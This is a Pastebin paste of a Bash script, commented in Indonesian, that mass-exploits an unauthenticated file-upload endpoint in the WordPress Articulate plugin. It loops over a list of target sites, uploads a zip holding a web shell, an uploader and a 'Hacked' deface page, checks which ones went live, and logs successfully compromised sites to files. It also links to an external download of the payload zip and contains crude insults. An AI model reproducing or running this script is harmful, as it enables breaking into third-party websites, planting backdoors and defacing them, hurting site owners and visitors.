Advertisement
LittleJok3r

ok

Jun 23rd, 2019
266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.68 KB | None | 0 0
  1. #!/bin/bash
  2. #write index.php,index.html & includes.php, after that zip all and for name usage kontoljaran.zip
  3. # KALO MASI GA NGERTI GA USAH EDIT INI ITU PAKE AJA INI TRUS BUAT FILE ZIPNYA DONLOT DISINI :https://www114.zippyshare.com/v/clxzCmAJ/file.html
  4. # masih ga ngerti ? tanya makmu "mak ko w tolol y ?"
  5. uplot(){
  6.     nn=`curl -k -s "${s}/index.php/wp-json/articulate/v1/upload-data" -F "name=kontoljaran.zip" -F "chunk=2" -F "chunks=3" -F "file=@kontoljaran.zip"`
  7.     if [[ ${nn} =~ 'Upload Complete!' ]]
  8.     then
  9.     echo "UPLOAD SUKSES"
  10.      echo "CEK UPLODER" #don't worry if you gets random dir
  11.       kk=`curl -k -s "${s}/wp-content/uploads/articulate_uploads/kontoljaran/index.php"`
  12.       if [[ ${kk} =~ 'KONTOLJARAN' ]]
  13.       then
  14.       printf "UPLOADER : "
  15.       echo "${s}/wp-content/uploads/articulate_uploads/kontoljaran/index.php" | tee -a suksesupload.txt
  16.       else
  17.       echo "UPLODER GA ADA CEK AJA MANUAL"
  18.       fi
  19.       echo "CEK SHELL"
  20.       if [[ `curl -k -s "${s}/wp-content/uploads/articulate_uploads/kontoljaran/includes.php"` =~ 'USTADCAGE_48' ]]
  21.       then
  22.       printf "SHELL : "
  23.       echo "${s}/wp-content/uploads/articulate_uploads/kontoljaran/includes.php" | tee -a suksesupload.txt
  24.     else
  25.       echo "SHELL GA ADA CEK AJA MANUAL"
  26.     fi
  27.     echo "CEK DEFACE"
  28.     if [[ `curl -k -s "${s}/wp-content/uploads/articulate_uploads/kontoljaran/index.html"` =~ 'Hacked' ]]
  29.     then
  30.       printf "DEFACE : "
  31.       echo "${s}/wp-content/uploads/articulate_uploads/kontoljaran/index.html" | tee -a depes.txt
  32.     else
  33.       echo "GAGAL DEFACE CEK AJA MANUAL"
  34.     fi
  35.     else
  36.     echo "GA VULN COK"
  37.    fi
  38. }
  39. for s in `cat $1`; do
  40.   echo "GASS ${s}"
  41.     uplot $s
  42. done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement